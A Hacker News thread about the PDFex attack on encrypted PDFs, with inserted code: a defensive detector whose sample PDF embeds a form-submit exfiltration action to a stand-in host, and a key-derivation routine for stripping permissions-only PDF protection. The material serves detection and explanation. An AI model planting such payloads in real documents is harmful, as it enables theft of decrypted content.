
New PDFex attack can exfiltrate data from encrypted PDF files - lelf
https://www.zdnet.com/article/new-pdfex-attack-can-exfiltrate-data-from-encrypted-pdf-files/
======
userbinator
Good riddance, the only thing I've ever seen PDF encryption used for is DRM.
In my mind, anything that breaks DRM is a bonus.

~~~
morpheuskafka
I know of one organization that uses it to enable early release of a time-
embargoed document to prevent server overload when it's released. Instead,
everyone downloads the document in advance and they release the password at
the release time.

~~~
snissn
They should use a CDN

~~~
notzuck
The first method sounds simpler and cheaper. You're over-engineering.

~~~
therein
I hope you're joking but it is not over-engineering if you're the kind of
organization important enough to have the need to release time-embargoed
documents on a regular basis.

Besides, he didn't suggest they bootstrap their own CDN. It could be as simple
as creating a Cloudflare account.

~~~
notzuck
Not joking. If the years have taught me anything, it would be pragmatism. You
want to introduce a new vendor and cost centre for what? Send your docs out
early followed by a password if that's secure 'enough' for your use case.

Any further guesses as to how "important" the organisation is is pointless in
the absence of understanding the actual use case.

------
moftz
FIRST Robotics Competition used to distribute the rulebook for the season in
an encrypted PDF. The password and unencrypted copies were released after the
live kickoff stream. Ten years ago we'd be busting ass trying to crack the PDF
but techniques weren't great then.

~~~
pietroglyph
FRC was the thing I immediately thought about when I saw this (they still do
PDF encryption), but the techniques here don't really apply.

I'm pretty sure that you _could_ just try to brute force it, as the passwords
are usually dictionary-based with substitutions (e.g. R0bot$InSp&ce).

Edit: After taking a much more in-depth look at it, all of the past game
manuals' passwords are too complex to crack in a reasonable time (even with a
dictionary). With a top 1000 word list dictionary with substitutions of
3-letter words like the above there are (conservatively) 1x10^20 combinations.
You can't crack the PDF user key directly either, because recent game manuals
use 256-bit AES keys.

------
reilly3000
I've always operated under the assumption that nothing in a PDF is secure, and
that the only safe way to redact something from one is to print it and rescan
it. Convince me otherwise?

~~~
bepvte
I believe that if you edit the pdf so that the thing you are redacting is no
longer in the pdf file, it is safely redacted. Printing a pdf and rescanning a
pdf breaks text selection and screen readers, and basically makes it into a
fancy PNG.

~~~
munk-a
There is a bunch of data in PDFs that may have previously been visible but is
no longer. I know that there are also fun meta-data attributes embedded on a
per-page and per document basis - and also that PDFs can be portfolio
documents where such a document will often contain no longer referenced PDFs
that became irrelevant to the PDF. The file format is pretty crazy.

------
ropiwqefjnpoa
Who would have imagined we'd have "branded" exploits in the future?

~~~
skavi
Vulnerabilities have been branded for some time now.

https://github.com/hannob/vulns

~~~
ropiwqefjnpoa
I still consider 2011 "the future"

------
andrekandre
from the list, looks like preview.app/skim is the least affected... i wonder
if that’s because it’s just lacking dynamic features of the others, or it’s
just coded better, or it’s because macOS security defaults...

------
taxidump
A company I was a contractor for would send payment invoices with a password.
The password was the last four digits of the ID number specific to the
contractor. The CRM we all used had every contractor's ID number in their
profile publicly available. When I asked what the point was I was told upper
management required a password and this was the easiest.

------
xvilka
At the same time no open source PDF reader can handle all cases of embedded
animation and PDF forms[1].

[1] https://gitlab.freedesktop.org/poppler/poppler/issues?label_name%5B%5D=forms

------
mettamage
Ehm, what is an exfiltration channel? I know what a sidechannel is, but I
haven't heard of exfiltration channel.

~~~
otakucode
Just a channel that is used for exfiltration. It's not a specific sort of
thing.

------
MartinMond
PSPDFKit CTO here. TL;DR on the PDFex vulnerability: The file format can carry
both encrypted and unencrypted parts, which allows "injecting" malicious
payload (embedded JavaScript, PDF forms that submit to remote URLs, etc) into
an encrypted PDF that then can be used to exfiltrate the encrypted PDF parts,
after the user decrypted the file (= entered the password).

We're currently investigating the vulnerability in detail and plan to ship an
update ASAP that will allow our customers to mitigate it.

I'll be monitoring this thread to answer any questions.
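A defender-side triage heuristic for the structure described in the post above, added here as an example; it is not PSPDFKit's or the PDFex researchers' code. It flags a file that declares encryption yet also carries an unencrypted way out of the document: an /Identity crypt filter (strings, streams or embedded files left in the clear) or a URL readable in plaintext next to a submit or URI action. The two sample PDFs are constructed and deliberately minimal (no xref table, dummy /O and /U values). The scan works on raw bytes; objects inside compressed object streams or appended by incremental updates need a real PDF parser, so treat a clean result as "nothing obvious", not "safe".

```python
import re

# Action/entry names that let a viewer contact a remote host or run code.
# Names are never encrypted in a PDF, so they are visible in any encrypted
# file; what matters for PDFex is whether their *targets* (strings, streams)
# are encrypted too.
ACTION_NAMES = {
    b'/SubmitForm': 'form submission to a URL',
    b'/JavaScript': 'JavaScript action',
    b'/JS': 'JavaScript code entry',
    b'/URI': 'URI action',
    b'/Launch': 'launch of an external application',
    b'/GoToR': 'remote go-to action',
}
_ACTION_RES = {re.compile(re.escape(n) + rb'(?![A-Za-z0-9])'): d
               for n, d in ACTION_NAMES.items()}

# Crypt filter settings that leave strings, streams or embedded files unencrypted.
_IDENTITY_FILTER = re.compile(rb'/(StmF|StrF|EFF)\s*/Identity|/CFM\s*/None')
# A literal string holding a URL; in a fully encrypted file this would be ciphertext.
_PLAINTEXT_URL = re.compile(rb'\((https?://[^)\\]*)\)')


def analyze_pdf(data: bytes) -> dict:
    """Byte-level triage of one PDF: is it encrypted, and if so, does it also
    expose an unencrypted channel (Identity filter or plaintext URL)?"""
    encrypted = b'/Encrypt' in data
    actions = sorted({d for rx, d in _ACTION_RES.items() if rx.search(data)})
    urls = [m.group(1).decode('latin-1') for m in _PLAINTEXT_URL.finditer(data)]
    identity = _IDENTITY_FILTER.search(data) is not None
    return {
        'encrypted': encrypted,
        'identity_filter': identity,
        'actions': actions,            # context only: legitimate encrypted forms have these too
        'plaintext_urls': urls,
        # Encryption plus an unencrypted way out of the file is the PDFex shape.
        'pdfex_indicator': encrypted and (identity or bool(urls)),
    }


# Constructed sample: encrypted document whose strings are left unencrypted
# (/StrF /Identity) and whose form submits to a URL that survives decryption.
SUSPECT_PDF = b"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /AcroForm << /Fields [4 0 R] >> /OpenAction 5 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R] >> endobj
4 0 obj << /Type /Annot /Subtype /Widget /FT /Tx /T (body) /V (<encrypted bytes>) >> endobj
5 0 obj << /S /SubmitForm /F (http://remote.example/collect) /Flags 4 >> endobj
6 0 obj << /Filter /Standard /V 4 /R 4 /Length 128 /StmF /StdCF /StrF /Identity
   /CF << /StdCF << /CFM /AESV2 /AuthEvent /DocOpen >> >> /O <00> /U <00> /P -1 >> endobj
trailer << /Root 1 0 R /Encrypt 6 0 R /ID [<01> <02>] >>
%%EOF
"""

# Constructed sample: ordinary encrypted document, strings and streams both
# under the standard crypt filter, no actions.
BENIGN_ENCRYPTED_PDF = b"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /Contents 4 0 R >> endobj
4 0 obj << /Length 8 >> stream
\x8a\x11\x20\x4c\xde\x01\x77\x3c
endstream endobj
5 0 obj << /Filter /Standard /V 4 /R 4 /Length 128 /StmF /StdCF /StrF /StdCF
   /CF << /StdCF << /CFM /AESV2 /AuthEvent /DocOpen >> >> /O <00> /U <00> /P -1 >> endobj
trailer << /Root 1 0 R /Encrypt 5 0 R /ID [<01> <02>] >>
%%EOF
"""

if __name__ == '__main__':
    for name, doc in (('suspect', SUSPECT_PDF), ('benign', BENIGN_ENCRYPTED_PDF)):
        print(name, analyze_pdf(doc))
```

The indicator deliberately ignores action names on their own: a legitimately encrypted form with a JavaScript validation script shows the same names, because names are plaintext in every encrypted PDF. Only the combination of declared encryption with content that is demonstrably not encrypted is reported.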

------
mistrial9
spies! everywhere! honestly, as someone who cares about typography and culture
in print, the constant and relentless "spies everywhere" statements from the
security community look more and more like a sickness, not a defense. PDF was
designed for print integrity, with images and typesetting, and I am grateful
for it every day. Please calm your alarmist content, and yes, security is
necessary... a good servant and a bad master, I would say.

~~~
kevin_thibedeau
Then they added JavaScript and made it Turing complete, completely negating
the effort to eliminate the general computability of PostScript.

~~~
otakucode
Not to mention the capability to execute any arbitrary executable.

------
WhiteOwlLion
I just remove the password with a command line tool without needing to know
the password.

~~~
lxgr
This tool likely only works for "passwordless" PDF encryption/protection,
which restricts some aspect of using the document (printing, exporting single
pages etc).

This is the domain of DRM/whitebox cryptography, and leaving aside all
discussions about the feasibility of such efforts, PDF's implementation of it
can safely be assumed to be broken – the master key used can be found in
several open source PDF tools' source code and on Stack Overflow, among other
places.

I assume the attacks presented in the paper are about the other type of PDF
encryption, which requires a password to even display the protected content,
which could definitely be done in a way not vulnerable to the attacks
described.

~~~
poizan42
The "master key" is just the empty password which means that the effective key
is all padding. This is documented in section 7.6.3.3 of ISO 32000-1:2008
(available for free from Adobe's website). There was never any real attempt to
keep it secret.
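Algorithm 2 from the section poizan42 cites (ISO 32000-1:2008, 7.6.3.3), written out as an added example; it is not the commenter's code. It covers revisions 2 to 4 of the standard security handler (RC4 and AES-128); the AES-256 revisions 5 and 6, which the FRC manuals mentioned earlier use, derive the key with a different SHA-256-based procedure and are not shown. The /O, /P and /ID values below are constructed stand-ins for what a real file's /Encrypt dictionary and trailer contain. The point to see is that with an empty user password every byte that goes into the MD5 is either the PAD constant printed in the standard or a value stored unencrypted in the file, so any reader can derive the key; that is all a "permissions-only" PDF relies on.

```python
import hashlib
import struct

# 32-byte padding string from ISO 32000-1:2008, 7.6.3.3, Algorithm 2 step (a).
# It is printed in the standard; there was never a secret here.
PAD = bytes([
    0x28, 0xBF, 0x4E, 0x5E, 0x4E, 0x75, 0x8A, 0x41, 0x64, 0x00, 0x4E, 0x56,
    0xFF, 0xFA, 0x01, 0x08, 0x2E, 0x2E, 0x00, 0xB6, 0xD0, 0x68, 0x3E, 0x80,
    0x2F, 0x0C, 0xA9, 0xFE, 0x64, 0x53, 0x69, 0x7A,
])


def pad_password(password: bytes) -> bytes:
    """Algorithm 2 step (a): pad or truncate the user password to 32 bytes.
    For the empty password the result is PAD itself."""
    return (password + PAD)[:32]


def compute_file_key(password: bytes, o_entry: bytes, p_entry: int, file_id: bytes,
                     revision: int, length_bits: int = 40,
                     encrypt_metadata: bool = True) -> bytes:
    """Algorithm 2 (standard security handler, revisions 2-4): derive the RC4 or
    AES-128 file key from the user password plus values stored unencrypted in
    the file (/O and /P from the /Encrypt dictionary, first element of /ID)."""
    if revision == 2:
        key_len = 5                                          # revision 2 is always 40-bit
    else:
        key_len = length_bits // 8
    md5 = hashlib.md5()
    md5.update(pad_password(password))                       # (a), (b)
    md5.update(o_entry[:32])                                 # (c) /O entry
    md5.update(struct.pack('<I', p_entry & 0xFFFFFFFF))      # (d) /P as 4-byte little-endian
    md5.update(file_id)                                      # (e) first /ID element
    if revision >= 4 and not encrypt_metadata:
        md5.update(b'\xff\xff\xff\xff')                      # (f)
    key = md5.digest()                                       # (g)
    if revision >= 3:
        for _ in range(50):                                  # (h) 50 further MD5 rounds
            key = hashlib.md5(key[:key_len]).digest()
    return key[:key_len]                                     # (i)


def permissions_only_key(o_entry: bytes, p_entry: int, file_id: bytes,
                         revision: int, length_bits: int = 128) -> bytes:
    """Key of a PDF that opens without a password but restricts printing or
    copying: the user password is empty, so every input here is public."""
    return compute_file_key(b'', o_entry, p_entry, file_id, revision, length_bits)


# Constructed sample values standing in for a real file's /Encrypt dictionary.
SAMPLE_O = bytes(range(32))                                  # constructed /O entry
SAMPLE_P = -3904                                             # constructed /P: print/copy restricted
SAMPLE_ID = bytes.fromhex('0123456789abcdef0123456789abcdef')  # constructed first /ID element

if __name__ == '__main__':
    key = permissions_only_key(SAMPLE_O, SAMPLE_P, SAMPLE_ID, revision=3)
    print('file key with empty user password:', key.hex())
    print('padded empty password == PAD:', pad_password(b'') == PAD)
```

Where a real user password is set, the same routine produces a key that depends on a secret the file does not contain, which is the second kind of protection lxgr distinguishes above; the difference between the two modes is entirely whether `password` is empty.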

